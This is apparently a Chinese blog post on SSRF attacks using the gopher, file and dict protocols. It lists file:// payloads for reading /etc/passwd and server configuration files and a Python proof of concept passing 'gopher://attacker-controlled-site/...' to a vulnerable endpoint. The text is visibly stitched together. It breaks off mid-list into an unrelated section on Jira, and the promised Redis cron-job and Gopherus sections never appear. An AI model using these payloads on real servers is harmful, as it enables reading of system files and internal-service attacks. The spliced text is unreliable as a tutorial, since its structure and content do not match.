SSRF攻击与Gopher协议

文章介绍了Gopher协议的历史及其在SSRF攻击中的应用,包括利用Gopher协议攻击Redis,写入定时任务和数据流构造。同时提到了file和dict协议,分别用于读取本地文件和探测内网服务,dict协议还能用于Redis命令执行。Gopherus工具用于自动化生成payload,简化攻击过程。

目录

Gopher协议简介

SSRF攻击中常用协议

file协议

dict协议

gopher协议

Gopher攻击Redis

使用gopher协议写入定时任务

 Gopherus工具构造gopher协议数据流


Gopher协议简介

Gopher定义Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;

gopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求,gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)


SSRF攻击中常用协议

file协议

file协议主要用于读取服务器本地文件,访问本地的静态资源

file协议数据格式:

file://文件绝对路径名

例如:

file:///etc/passwd
file:///var/www/html/index.php
file:///usr/local/apache-tomcat/conf/server.xml

dict协议

dict协议一般常用来探测内网主机以及端口开放情况,既然能够探测端口,那么可以探测不同端口对应的服务的指纹信息。当然dict协议也可以用来执行一些服务的命令,如redis

  • 内网主机探测
### 关于SSRF漏洞中的Gopher协议 在服务器端请求伪造(Server-Side Request Forgery, SSRF攻击中,利用特定协议可以扩大攻击面并提升危害程度。其中一种值得注意的是 Gopher 协议。此协议允许客户端通过简单的字符串命令来获取远程资源,在某些情况下可被恶意利用。 当应用程序未充分验证用户输入即用于发起 HTTP 请求时,则可能存在 SSRF 风险[^1]。如果目标系统支持非标准 URL 方案如 `gopher://` 并且缺乏适当过滤机制的话,那么攻击者就有可能构造特殊形式的数据包以执行任意指令或读取本地文件等内容。 对于 Jira 这样的应用而言,已知存在可以通过精心设计的 URL 来触发内部服务调用的情况,这其中包括但不限于使用 gopher 协议来进行非法操作的可能性。为了防止此类问题的发生,开发人员应当严格控制对外部网络连接的支持范围,并实施白名单策略限制可用方案种类;同时还要注意对所有来自用户的参数做全面的安全审查。 ```python import requests url = "http://example.com/vulnerable_endpoint" payload = 'gopher://attacker-controlled-site/...' response = requests.get(url, params={'param': payload}) print(response.text) ``` 上述代码片段展示了如何向易受攻击的服务发送包含有潜在危险 URI 的 GET 请求。请注意实际环境中不应如此实现,而仅作为概念证明展示可能存在的风险点。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值